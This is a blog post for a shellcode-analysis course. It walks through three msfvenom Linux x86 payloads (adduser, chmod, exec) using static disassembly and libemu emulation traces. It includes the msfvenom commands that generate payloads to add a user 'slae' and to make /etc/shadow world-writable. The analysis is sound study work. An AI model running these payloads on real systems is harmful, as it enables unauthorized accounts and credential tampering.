SLAEx86 : Analyzing Shellcode

In this blog post I will analyze 3 shellcodes created using msfvenom

Shellcode 1: linux/x86/adduser shellcode
Command Used : msfvenom --platform linux --arch x86 --payload linux/x86/adduser USER=slae PASS=slaeslae -i0 -fc

Static Analysis
Our first analysis is with ndisam tool, where we tried to recreate the equivalent instruction from the raw hex string.


Dynamic Analysis
r2 disassembly 

Libemu was not able to do much for this shellcode. Neither it could generate any equivalent code for the shellcode nor any call graph for it.

Shellcode 2: linux/x86/chmod shellcode
Command Used : msfvenom --platform linux --arch x86 --payload linux/x86/chmod FILE=/etc/shadow MODE=0666 -i0 -fc

Static Analysis
Our first analysis is with ndisam tool, where we tried to recreate the equivalent instruction from the raw hex string.

Dynamic Analysis
r2 disassembly 

Call Graph generated by libemu emulation

stepcount 12
[emu 0x0x88f3078 debug ] cpu state    eip=0x00417026
[emu 0x0x88f3078 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a
[emu 0x0x88f3078 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x88f3078 debug ] Flags:
ERROR  chmod (
) =  -1;
ERROR  exit (
     int status = 4288522;
) =  -1;


Shellcode 3: linux/x86/exec
Command Used : msfvenom --platform linux --arch x86 --payload linux/x86/exec CMD=ls -i0 -fc

While performing this shellcode analysis I noticed something interesting like 22 and line 23 opcodes were not correctly detected by the disassembler. 6C 73 should have been interpreted as data instead of instruction. It is the hex representation of ascii "ls". However the best part is libemu correctly identified it and was able to generate an equivalent code for it.

Static Analysis
Our first analysis is with ndisam tool, where we tried to recreate the equivalent instruction from the raw hex string.


Dynamic Analysis
r2 disassembly 

Call Graph generated by libemu emulation

stepcount 15
[emu 0x0x975d078 debug ] cpu state    eip=0x00417028
[emu 0x0x975d078 debug ] eax=0x0000000b  ecx=0x00416fb0  edx=0x00000000  ebx=0x00416fc0
[emu 0x0x975d078 debug ] esp=0x00416fb0  ebp=0x00000000  esi=0x00000000  edi=0x00416fc8
[emu 0x0x975d078 debug ] Flags:
int execve (
     const char * dateiname = 0x00416fc0 =>
           = "/bin/sh";
     const char * argv[] = [
           = 0x00416fb0 =>
               = 0x00416fc0 =>
                   = "/bin/sh";
           = 0x00416fb4 =>
               = 0x00416fc8 =>
                   = "-c";
           = 0x00416fb8 =>
               = 0x0041701d =>
                   = "ls";
           = 0x00000000 =>
             none;
     ];
     const char * envp[] = 0x00000000 =>
         none;
) =  0;


This blog post has been created for completing the requirements of SecurityTube Linux Assembly Expert Certification: http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: PA-1191